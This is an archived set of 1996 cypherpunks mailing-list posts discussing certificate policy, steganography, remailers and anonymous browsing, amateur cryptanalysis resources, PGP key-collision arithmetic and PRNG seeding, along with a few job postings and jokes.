owners should be able to sign certificates that say arbitrary things, 
regardless of whether or not some third party agrees that the statement
being signed is "true". Unless you believe in libel, slander, etc., which
raises policy issues of a different sort entirely.

The John Birch Society can sign something claiming that I'm a member. 
A policy that says that's sufficient information to conclude that I *am* a 
John Bircher is a broken policy. A policy that requires both the above and
a signature by me on the same certificate, among other things, is viable.

> There's actually a third sort of important certificate the system should 
> handle:
> 
> (3) I might be a member of a secret society; I might need a membership 
>     certificate to get access, say, to certain web sites. The system 
>     should allow a "secret certificate," readable only by the issuer.

Your description is a bit ambiguous. Do you really mean "readable", or
do you mean "verifiable" ?

If the former, it sounds like this could be handled by distributing 
signed certificates encrypted with the issuer's public key. 

If the latter, you could distribute signed certificates but not the public key
needed to verify the signatures on the certs.

It might be handy to use a hybrid approach, such as distributing signed
certificates that refer to encrypted entity names (suitably padded with
random bytes to avert trial encryption of plaintext guesses).  

-Lewis	"You're always disappointed, nothing seems to keep you high -- drive 
	your bargains, push your papers, win your medals, fuck your strangers;
	don't it leave you on the empty side ?"  (Joni Mitchell, 1972)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Just Rich <rich@c2.org>
Date: Sun, 3 Mar 1996 12:04:13 +0800
To: David Lesher <wb8foz@nrk.com>
Subject: Re: NYT login
In-Reply-To: <199603020315.WAA00485@nrk.com>
Message-ID: <Pine.SUN.3.91.960301193905.6851A-100000@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Rumour has it that there might be a cpunks/cpunks (cypherpunks was taken).

-rich

On Fri, 1 Mar 1996, David Lesher wrote:

> At one point, some kind souls were entering "username: cypherpunks"
> logins for all the various "free" www sites.
> 
> Did anyone catch the www.nytimes.com one? If so, what password?
> 
> -- 
> A host is a host from coast to coast.................wb8foz@nrk.com
> & no one will talk to a host that's close........[v].(301) 56-LINUX
> Unless the host (that isn't close).........................pob 1433
> is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mutant Rob <wlkngowl@unix.asb.com>
Date: Sat, 2 Mar 1996 22:28:17 +0800
To: cypherpunks@toad.com
Subject: Is there any work on entropy-lowering schemes?
Message-ID: <199603020046.TAA08670@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I'm wondering if anyone has done any work on schemes to lower the
entropy of a given stream.  Why?  Save you've got message M encrypted
with a good cipher, but you're worried that it can be detected because
even with stego, the entropy is a lot higher than normal 'random' data
flowing through a network.

So it seems possible to create a scheme that given a key will take a
block of n bits and expand it to 1.5n or 2n bits, recoding it in such
a way that determining the key is difficult even if one suspects such
a scheme has been used... but that using the scheme will make the data
look more like the MSBs of graphical data rather than encrypted data.


Rob
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMTeaeioZzwIn1bdtAQGNagF/cmAH45G1v1Yt1Bg+7qgZVVnIYdj9EfzV
rqzPx7MRyGbVW4HtNWkYjiPxgn2iUQaH
=t114
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Willoughby <frankw@in.net>
Date: Sat, 2 Mar 1996 11:40:08 +0800
To: anon-remailer@utopia.hacktic.nl (Anonymous)
Subject: Re: Seeking Position
Message-ID: <9603020134.AA15923@su1.in.net>
MIME-Version: 1.0
Content-Type: text/plain


Those interested in an Information Security-related position
might be interested in checking out:

        Cameron Carey
        Computer Security Placement Service
        (508) 393-7803

He specializes in placing InfoSec persons (only).  His contacts 
are numerous and last time I checked, he knew of about a dozen
or so openings.

I have used him in the past.  He's one of very few headhunters
I have met who will actually work your resume & call you frequently
with the status (where your resume is, the type of company, etc.).

FWIW, it doesn't matter if you mention my name or not - I have no 
vested interest in recommending him other than I believe that people 
who do a good job ought to be recommended to others.

Best Regards,


Frank

<standard disclaimer>
The opinions expressed above are of the author and may not 
necessarily be representative of Fortified Networks Inc.

Fortified Networks Inc. - Management & Information Security Consulting
Phone: (317) 573-0800   - http://www.fortified.com/fortified
Home of the Free Internet Firewall Evaluation Checklist







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sun, 3 Mar 1996 12:07:27 +0800
To: sameer@atropos.c2.org
Subject: Re: Win a free Apache-SSL-US Commercial license
In-Reply-To: <199603020048.QAA24966@atropos.c2.org>
Message-ID: <Pine.SOL.3.91.960301204634.8380C-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 1 Mar 1996 sameer@atropos.c2.org wrote:

> 	See http://apachessl.c2.org/ for more details.

Not quite an entry, but am I the only one to pronounce SSL "Cecil" 
(SEcure Socket layer), to go along with SHTTP as "Shit-p" (nil)?
Cecil The C2 Web server?

Simon

---
They say in  online country             So which side are you on boys
There is no middle way                  Which side are you on
You'll either be a Usenet man           Which side are you on boys
Or a thug for the CDA                   Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ed Carp <erc@dal1820.computek.net>
Date: Sat, 2 Mar 1996 12:59:24 +0800
To: Nelson Minar <nelson@santafe.edu>
Subject: Re: Chaff in the Channel (Stealth PGP work)
In-Reply-To: <199603010418.VAA02087@nelson.santafe.edu>
Message-ID: <Pine.3.89.9603012221.A12622-0100000@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 29 Feb 1996, Nelson Minar wrote:

> tcmay@got.net (Timothy C. May) writes:
> >This is my take on fixing the stego situation. Instead of worrying about a
> >"stealth PGP version," which is likely to be only a slight speed bump
> >(because of the statistics), think about flooding the detection channels.

> As noble as "flood the detection channels" sounds, has it really ever
> succeeded? Do people who don't care about privacy day to day ever go
> through extra trouble to make other people's privacy easier? I can

I still like the idea of EVERYONE using encryption.  Hiding stuff in 
plain sight always has appealed to me.
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

The mark of a good conspiracy theory is its untestability.
		    -- Andrew Spring





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Sun, 3 Mar 1996 18:53:47 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: NYT login
Message-ID: <199603020315.WAA00485@nrk.com>
MIME-Version: 1.0
Content-Type: text/plain


At one point, some kind souls were entering "username: cypherpunks"
logins for all the various "free" www sites.

Did anyone catch the www.nytimes.com one? If so, what password?

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 3 Mar 1996 23:16:03 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Anonymous Web Browsing
Message-ID: <ad5d295b00021004b01f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:24 AM 3/2/96, dwhite@pris.bc.ca wrote:
>        Hi guys..... I'm new here and I don't have the same technical
>expertise as I am witnessing with most of the other posters here.

>        My question is this:  Would it be possible to create a web site that
>would function along the same lines as remailers do?  Something that would
>allow a person to browse anonymously.   So lets say I surfed into a

These are "web proxies," and searching on this should produce some
information to answer your questions.

Most of us, I think, are not using them.

Your intuitions are correct, that protection steps are needed. The
technology is developing, but the perceived need (anonymous browsing) is
probably less than the perceived need for anonymous e-mail.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Sat, 2 Mar 1996 09:16:03 +0800
To: cypherpunks@toad.com
Subject: Seeking Position
Message-ID: <199603012135.WAA12346@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Long time cypherpunk reader seeks position.

Class of 1996/J.D.: Top 10 U.S. Law School.
B.A. International Affairs: Top 25 U.S. University.

Highly proficent in modern fieldcraft, intelligence operations and 
communications security.

Will sit for bar exam of employer's choice.

Expert pistol, advanced tactical carbine, master level tactical driving 
abilities.  Significant previous international clandestine fieldwork 
experience in developing and Eastern European countries pursuant to 
political risk analysis projects.

Extensive legal expertise in white collar criminal investigation, 
national security law, bankrupcy, U.S. taxation of international and 
expatriot income, corporate governence, antitrust, 10(b), 10b-5 and 
misappropriation insider trading issues.

Ideal canidate for high level position in emerging or existing 
security/economic/political risk analysis department of international 
firm, field agent for political risk consultant or to address the 
discrete needs of private client.

Most rigorous international travel regime welcome.

Serious inquiries only.
TLA's need not apply.
No wet work.
Illegal proposals will be ignored.
Borderline proposals considered with interest.

Submit position description along with firm/client CV to:
an436533@anon.penet.fi

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCPAzE3Z7oAAAEEAMClYX8ZIZ/3iwlH96s/JssxRPdmoh6fQcpBLFL8kLkthgkr
bXo+Hh/gAKYmYYgDgT/SKfbpAE7qIMg+Ra8WvpMoBuhKNcCt7D7aruxGvId+l7nq
KFfSLy6lVviQyVSPjCNxnCvbACIpEtXC1NnyxlShE+l6RvuVA/HuoJlH4LbVABEB
AAG0FmFuNDM2NTMzQGFub24ucGVuZXQuZmk=
=D7tQ
-----END PGP PUBLIC KEY BLOCK-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sun, 3 Mar 1996 23:17:19 +0800
To: cypherpunks@toad.com
Subject: Re: Cryptanalysis
Message-ID: <2.2.32.19960302065210.009574b4@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:55 PM 2/29/96 -0800, Timothy C. May wrote:

>There are several places to look:

Thanks for the sources.  More money is going to get dumped into cryptobooks
soon.  (I am amazed how little exists on the web on the topic.) I had seen a
few of the books at a local bookstore, but I was uncertain of their quality.
(They also had a number of snake-oil crypto books.)

>However, these books are based on work done in WWII and the following
>decade(s), so the stuff is pretty dated. Still, nearly any "snake oil
>crypto" system, such as it sounds like your friend is building, will likely
>be far weaker than the ciphers the NSA was attacking back in the early
>days.

The author has failed to call me back.  I do have some serious concerns
about the code.  (There is not a single XOR used, except to clear
registers!)  I am starting to suspect that it is based on a mathematical
progression based on the numbers 40, 28, 36.  I need to spend a bit of time
on the code with a debugger to find out just where that segment of code is
located.  (Should not take too long...  Just have to make the time.)

>* The journal "Cryptologia" is largely devoted to amateur cryptanalysis.

The web info for back issues listed a web page from a publisher that had no
listing for them on the server.  I will be sending mail to get more info...

>>The Cyphernomicon has a couple of paragraphs, but nothing on
>>techniques or pointers to other references.  RSA's FAQ has
>>little to nothing as well. A web search turned up little
>>useful. Most of the other references I have found have been for
>>current cyphers, but next to nothing about breaking them.
>
>There are very good reasons to say little about "conventional
>cryptanalysis": it just doesn't matter much with modern ciphers, such as
>public key systems. Modern ciphers don't fall to conventional attacks based
>on word frequency, pattern analysis, etc.

Still an interesting topic...

>Your friend is on a hopeless task. If he doesn't understand just how
>hopeless it is to develop a homegrown, conventional cipher then he's
>certainly not likely to take the time to become a skilled amateur
>cryptanalyst.

I am trying to convince him of the futility of the task.  (It is hard as his
ego keeps getting in the way.)  I just want to give him reasons why it is
weak and not just glittering generalities.

Thanks again for the book references!
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
"I, Caligula Clinton... In the name of the Senate and the people of Rome!"
   - Bill Clinton signing the CDA with the First Amendment bent over.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 2 Mar 1996 15:24:41 +0800
To: Alan Olsen <cypherpunks@toad.com
Subject: Re: Cryptanalysis
Message-ID: <ad5d339a0102100418bc@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:52 AM 3/2/96, Alan Olsen wrote:

>The author has failed to call me back.  I do have some serious concerns
>about the code.  (There is not a single XOR used, except to clear
>registers!)  I am starting to suspect that it is based on a mathematical
>progression based on the numbers 40, 28, 36.  I need to spend a bit of time
                                  ^^^^^^^^^^
Ah, note that the magic key, 42, is not included. Coincidence, or stupidity?

Alan, there is not enough time in the universe to waste it on those who
will not learn even the basics. The "author," who I had understood to be a
friend of yours (though apparently a more distant relationship is
involved), is apparently developing something John Dee would have been
proud of.

Fortunately for the rest of us, cryptology has moved on in the last several
hundred years.

I again urge you not to waste your time on this. Or our time.

(Trust me, in five or six years, if your friend sticks to his current
course, he will announce to the world his "discovery" of the "virtual one
time pad" and will be preparing a public stock offering in Silicon
Snakeoiltronics.)


A few other minor points:

>>* The journal "Cryptologia" is largely devoted to amateur cryptanalysis.
>
>The web info for back issues listed a web page from a publisher that had no
>listing for them on the server.  I will be sending mail to get more info...

Last I checked, Tony Patti was still the editor. Not all things are on the
Web in serious ways, obviously. I had no problems finding copies in my
local university library (UC Santa Cruz), but it was several years ago that
I last checked (conventional cryptanalysis not being very germane and all).
Reed College might have copies.

>>There are very good reasons to say little about "conventional
>>cryptanalysis": it just doesn't matter much with modern ciphers, such as
>>public key systems. Modern ciphers don't fall to conventional attacks based
>>on word frequency, pattern analysis, etc.
>
>Still an interesting topic...

Perhaps as a hobby, for those who find the NYT crosswords exciting. But of
little significance for modern cryptology, except as a cautionary tale.

--Tim May

THE X-ON CONGRESS:  INDECENT COMMENT ON AN INDECENT SUBJECT, by Steve
Russell, American Reporter Correspondent....You motherfuckers in Congress
have dropped over the edge of the earth this time... "the sorriest bunch
of cocksuckers ever to sell out the First Amendment" or suggesting that
"the only reason to run for Congress these days is to suck the lobbyists'
dicks and fuck the people who sent you there," ....any more than I care
for the language you shitheads have forced me to use in this
essay...Let's talk about this fucking indecent language bullshit.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dwhite@pris.bc.ca
Date: Sat, 2 Mar 1996 14:03:05 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Anonymous Web Browsing
Message-ID: <199603020519.WAA01634@pris.bc.ca>
MIME-Version: 1.0
Content-Type: text/plain




        Hi guys..... I'm new here and I don't have the same technical
expertise as I am witnessing with most of the other posters here.

        I do have a question and I hope that it is not too technically naive.

        I have followed the ongoing discussion on PGP security, remailers
and the like.  I am wondering if the current trend with interactive Web
browsing, Java, etc, is not going to create a privacy problem every bit as
significant as insecure e-mail.  As these "applets" become more
sophisticated are we not going to have to face up to the issue of dynamic
links to web sites that gather a lot of info from your computer as you
interact with it?  The recent controversy at Microsoft indicates to me that
interactive Web applets could easily be programmed with hidden "siphon
hoses" that are quitely sucking data from you while you look at the latest
Baywatch poses.

        I am not a programer so I don't know how it would work.  It just
seems to me that it would not be that tall an order to accomplish.  Correct
me if I am wrong.

        My question is this:  Would it be possible to create a web site that
would function along the same lines as remailers do?  Something that would
allow a person to browse anonymously.   So lets say I surfed into a
Interactive Web site that has some kind of Java applet for......say
portfolio projections..... Any personal financial info I dumped into it for
analysis sake could be collected by the server for some kind of customer
profile.  Lets say that I didn't want sensitive financial info exposed to
someone else without my knowledge.  So then I would log into a "Re-Webber"
that would allow me to continue on to the subject site with any electronic
signature following back to the anonymous Web, not back to me.  Another
example that this would be a concern would be in the coming explosion of
Bank oriented services that are coming available.  A "Re-Web" would let you
use applets on a Bank server without the concern that the Bank is gathering
MORE sensitive info on you.

        Forgive me if this technically naive.  I admit I don't know what I
am talking about.  It was something that piqued my curiosity as I was
reading various posts about e-mail security.

        Doug                    dwhite@pris.bc.ca





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Sun, 3 Mar 1996 12:05:14 +0800
To: cypherpunks@toad.com
Subject: PGP PRNG seeds?
Message-ID: <9603020437.AA09542@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


Hi!

I tinkered with the switch
pgp +makerandom=size output.fil

Is there a way to "seed" the PRNG with another file, say , part of an encrypted text file?

Thanks

JFA





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sun, 3 Mar 1996 23:16:42 +0800
To: cypherpunks@toad.com
Subject: Re: Cryptanalysis
Message-ID: <2.2.32.19960302074457.008c6a08@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:11 PM 3/1/96 -0800, Timothy C. May wrote:
>At 6:52 AM 3/2/96, Alan Olsen wrote:
>
>>The author has failed to call me back.  I do have some serious concerns
>>about the code.  (There is not a single XOR used, except to clear
>>registers!)  I am starting to suspect that it is based on a mathematical
>>progression based on the numbers 40, 28, 36.  I need to spend a bit of time
>                                  ^^^^^^^^^^
>Ah, note that the magic key, 42, is not included. Coincidence, or stupidity?

Actually it is an obscure reference to a movie called "Our Man Flint".  It
was the basis of the code used in the movie.

>Alan, there is not enough time in the universe to waste it on those who
>will not learn even the basics. The "author," who I had understood to be a
>friend of yours (though apparently a more distant relationship is
>involved), is apparently developing something John Dee would have been
>proud of.

He is more aquaintence than friend...  Someone who is a close friend asked
me to get involved.

As for the other reasons for asking for the references, it is more a matter
of personal curiosity.

I expect his project to fail anyways for reasons i have already stated...
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
"I, Caligula Clinton... In the name of the Senate and the people of Rome!"
   - Bill Clinton signing the CDA with the First Amendment bent over.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sun, 3 Mar 1996 23:16:57 +0800
To: cypherpunks@toad.com
Subject: Re: Cryptanalysis
Message-ID: <2.2.32.19960302074459.008cf148@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:11 PM 3/1/96 -0800, Timothy C. May wrote:

>>>* The journal "Cryptologia" is largely devoted to amateur cryptanalysis.
>>
>>The web info for back issues listed a web page from a publisher that had no
>>listing for them on the server.  I will be sending mail to get more info...
>
>Last I checked, Tony Patti was still the editor. Not all things are on the
>Web in serious ways, obviously. I had no problems finding copies in my
>local university library (UC Santa Cruz), but it was several years ago that
>I last checked (conventional cryptanalysis not being very germane and all).
>Reed College might have copies.

My mistake...  The publication I was thinking of was "the Journal of
Cryptology".  They reference Springer-Verlag New York Inc. as the source for
back issues, but there is no listing on the linked web page for that journal
and the search engine returns nothing for that journal.  (They do have a few
other things of interest however...)

The time spent was not a loss...  I found a number of interesting things on
the web and recieved a number of pointers to books I was not aware of and
are not listed in any of the FAQs.

The best site I found was at:

http://mnementh.cs.adfa.oz.au/htbin/bib_lpb

It is for Lawries Cryptography Bibliography.  It contains a search engine to
a large listing of crypto articles.  Worth checking out.
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
"I, Caligula Clinton... In the name of the Senate and the people of Rome!"
   - Bill Clinton signing the CDA with the First Amendment bent over.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Sun, 3 Mar 1996 23:13:43 +0800
To: "A. Padgett Peterson P.E. Information Security" <cypherpunks@toad.com
Subject: Re: Problems with certificates.
Message-ID: <199603020757.XAA18751@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 08:35 AM 3/1/96 -0500, A. Padgett Peterson P.E. Information Security wrote:
>Today, each person generates their own PGP key. While it is unlikely that
>any two will match, it is likely that at some point some two will match
>(see matching birthdays in a bar - number is less than you would think).

If if we colonized every planet in the galaxy, and every planet had a 
trillion people, and every single person on every planet generated a billion 
keys a second for a billion billion years, not one pair would match, assuming 
they were generated from truly random seeds.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: johan@eniac.campus.luth.se (Johan Sandberg)
Date: Sun, 3 Mar 1996 16:58:59 +0800
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: Cypherpunk remailer
In-Reply-To: <199603010836.AAA29132@ix7.ix.netcom.com>
Message-ID: <1050.6634T999T1911@eniac.campus.luth.se>
MIME-Version: 1.0
Content-Type: text/plain



>At 07:24 PM 2/29/96 +0100, you wrote:

>>>The mixmaster remailers require special client software on your machine.
>>
>>What special software? What will the client do?

>It's "The Mixmaster Client Software".  Mixmaster is a relatively complex
>system that breaks up the message into encrypted pieces that get sent
>separately to a destination mixmaster, which decrypts and reassembles the
>pieces and sends the message on to the final destination.  It's more secure,
>partly because all the transmissions are encyrpted, and partly because it's
>much harder to do traffic analysis on a network of indentical-sized chunks
>floating around than on messages with distinct sizes that you can watch.

>I think the client only runs on Unix, or at least doesn't run on DOS,
>though there's some porting work being done, and you can probably find
>it on one of the Netherlands remailer sites.

Ok.. that explains it!
But If I really need to be that sure of not being tracked down I could use the
Mixmaster on my unix shell account!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 3 Mar 1996 23:16:07 +0800
To: cypherpunks@toad.com
Subject: Re: Cryptanalysis
Message-ID: <ad5d44ed030210042ab2@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:44 AM 3/2/96, Alan Olsen wrote:

>My mistake...  The publication I was thinking of was "the Journal of
>Cryptology".  They reference Springer-Verlag New York Inc. as the source for
>back issues, but there is no listing on the linked web page for that journal
>and the search engine returns nothing for that journal.  (They do have a few
>other things of interest however...)

One gets the "Journal of Cryptology" automatically by attending the Crypto
Conference (at least this was so in the past). I can't see that it carries
much that the "Crypto" and "Eurocrypt" Proceedings carry (though Chaum's
"Dining Cryptographers" paper was in Volume I, Number 1, circa 1988-89).

"Cryptologia" is a much different thing.

Neither is necessary for the disposing of snake oil products, however.

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Sat, 2 Mar 1996 17:32:12 +0800
To: perry@piermont.com
Subject: Re: Problems with certificates.
Message-ID: <199603020912.BAA28408@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain




jamesd@echeque.com writes:
>> If if we colonized every planet in the galaxy, and every planet had a 
>> trillion people, and every single person on every planet generated a billion 
>> keys a second for a billion billion years, not one pair would match, assuming
>> they were generated from truly random seeds.

At 03:19 AM 3/2/96 -0500, Perry E. Metzger wrote:
>Well, lets see. For a 1024 bit key, a birthday match is a 1 in 2^512
>proposition, assuming that a key could be any random 1024 bit number.
>Assuming 100 million planets:
>
>100000000*(10^12)*(10^9)*60*60*24*365*(10^9)*(10^9)=
>    3153600000000000000000000000000000000000000000000000000
>2^512=
>   134078079299425970995740249982058461274793658205923933777235614437217\
>   640300735469768018742981669034276900318581864860508537538828119465699\
>   46433649006084096
>
>However, the density of prime numbers isn't so high as to make the
>probability truly 1/2^512 -- indeed, I would guess it is much
>lower. However, you may indeed be right.

The number of prime numbers less than n is n/ln(n).  Presumably the number
of valid PGP keys is somewhat larger.

Assume 768 bit PGP keys: 

The number of randomly selected 768 bit primes that you would need for a
reasonable chance of a birthday collision is 1.708E104

Which is 

170 800 000 000 000 000 000 000 000 000 000 000 000 000 000 000 000 000 000
000 000 000 000 000 000 000 000 000 000 000 000 000 000 000 000 

A number substantially larger than 
3 153 600 000 000 000 000 000 000 000 000 000 000 000 000 000 000 000 000

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Gibbons <steve@aztech.net>
Date: Sun, 3 Mar 1996 19:52:35 +0800
To: ses@tipper.oit.unc.edu
Subject: Re: Win a free Apache-SSL-US Commercial license
Message-ID: <0099EB61.3A09B480.1616@aztech.net>
MIME-Version: 1.0
Content-Type: text/plain


In Article: <Pine.SOL.3.91.960301204634.8380C-100000@chivalry>, Simon Spero <ses@tipper.oit.unc.edu> wrote:
# On Fri, 1 Mar 1996 sameer@atropos.c2.org wrote:

# > 	See http://apachessl.c2.org/ for more details.

# Not quite an entry, but am I the only one to pronounce SSL "Cecil" 
# (SEcure Socket layer), to go along with SHTTP as "Shit-p" (nil)?
# Cecil The C2 Web server?

The word that always springs to my mind is "sessile."  (Granted, I'm a
pessimist, at heart... ;)

--
Steve@AZTech.Net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mutant Rob <wlkngowl@unix.asb.com>
Date: Sun, 3 Mar 1996 23:10:53 +0800
To: cypherpunks@toad.com
Subject: Re: PGP PRNG seeds?
Message-ID: <199603020745.CAA11593@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Jean-Francois Avon (JFA Technologies, QC, Canada) wrote:
> I tinkered with the switch
> pgp +makerandom=size output.fil
> 
> Is there a way to "seed" the PRNG with another file, say , part of an
> encrypted text file?

Copy the first 408 bytes of that file to the randseed.bin file in your
pgp directory. (I'd save the original randseed.bin file or use a good
RNG to generate a new one when you're done).
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMTf8qyoZzwIn1bdtAQHrZQF/dM8RgYDEB+pTSmdy9HSIi38YKy9LG9FE
yBZtka9z28A2UyVvi37ijP8DrcOYg4zI
=duUA
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 2 Mar 1996 16:47:18 +0800
To: jamesd@echeque.com
Subject: Re: Problems with certificates.
In-Reply-To: <199603020757.XAA18751@dns1.noc.best.net>
Message-ID: <199603020819.DAA24292@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



jamesd@echeque.com writes:
> At 08:35 AM 3/1/96 -0500, A. Padgett Peterson P.E. Information Security wrote
:
> >Today, each person generates their own PGP key. While it is unlikely that
> >any two will match, it is likely that at some point some two will match
> >(see matching birthdays in a bar - number is less than you would think).
> 
> If if we colonized every planet in the galaxy, and every planet had a 
> trillion people, and every single person on every planet generated a billion 
> keys a second for a billion billion years, not one pair would match, assuming
> they were generated from truly random seeds.

Well, lets see. For a 1024 bit key, a birthday match is a 1 in 2^512
proposition, assuming that a key could be any random 1024 bit number.
Assuming 100 million planets:

100000000*(10^12)*(10^9)*60*60*24*365*(10^9)*(10^9)=
    3153600000000000000000000000000000000000000000000000000
2^512=
   134078079299425970995740249982058461274793658205923933777235614437217\
   640300735469768018742981669034276900318581864860508537538828119465699\
   46433649006084096

However, the density of prime numbers isn't so high as to make the
probability truly 1/2^512 -- indeed, I would guess it is much
lower. However, you may indeed be right.

None the less, one would hope that the software handled it gracefully
even if the impossible happened...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eggplant@inlink.com (eggplant)
Date: Sat, 2 Mar 1996 18:12:49 +0800
To: cypherpunks@toad.com
Subject: Learning about Cryptography
Message-ID: <v01510106ad5dcbdf9695@[206.196.98.125]>
MIME-Version: 1.0
Content-Type: text/plain



I am interested in learning more about cryptography. Where could I obtain
some good, recent books on cryptography for the beginner.


--
"... In Germany they first came for the Communists and I
didn't speak up because I wasn't a Communist. Then they came
for the Jews, and I didn't speak up because I wasn't a Jew.
Then they came for the trade unionists, and I didn't speak
up because I wasn't a trade unionist.  Then they came for
up because I wasn't a trade unionist.  Then they came for
Catholics, and I didn't speak up because I was a Protestant.
Then they came for me-and by that time no one was left to
speak up..." Pastor Martin Niemoller

************************************************
*									                       																									                *
* 		Matthew Murphy	------------ eggplant@inlink.com	                      *
